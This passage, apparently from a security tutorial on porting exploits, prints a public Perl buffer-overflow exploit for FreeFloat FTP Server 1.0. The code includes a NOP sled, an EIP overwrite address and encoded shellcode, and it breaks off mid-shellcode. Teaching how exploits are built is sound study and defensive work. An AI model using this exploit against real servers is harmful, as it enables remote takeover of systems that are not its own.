Porting a Perl-based exploit
Let's start by understanding the structure of a Perl-based exploit. In the following example, we will be writing an exploit for FreeFloat FTP Server Version 1.0, which triggers a buffer overflow vulnerability in the server. Let's see the publically available version of this exploit in Perl:
use strict;
use Socket;
my $command = "APPE ";
my $buffstuff = "\x90" x 246;
my $offset_eip = pack('V',0x71AB9372);
my $payloadencoded="\x90" x 50;
$payloadencoded=$payloadencoded. "\xba\x3f\xd4\x83\xe9\xdb\xcc\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x56\x31\x57\x13\x83\xc7\x04\x03\x57\x30\x36\x76\x15" .
"\xa6\x3f\x79\xe6\x36\x20\xf3\x03\x07\x72\x67\x47\x35\x42" .
"\xe3\x05\xb5\x29\xa1\xbd\x4e\x5f\x6e\xb1\xe7\xea\x48\xfc" .
"\xf8\xda\x54\x52\x3a\x7c\x29\xa9\x6e\x5e\x10\x62\x63\x9f" .
"\x55\x9f\x8b\xcd\x0e\xeb\x39\xe2\x3b\xa9\x81\x03\xec\xa5" .
"\xb9\x7b\x89\x7a\x4d\x36\x90\xaa\xfd\x4d\xda\x52\x76\x09" .
"\xfb\x63\x5b\x49\xc7\x2a\xd0\xba\xb3\xac\x30\xf3\x3c\x9f" .
"\x7c\x58\x03...
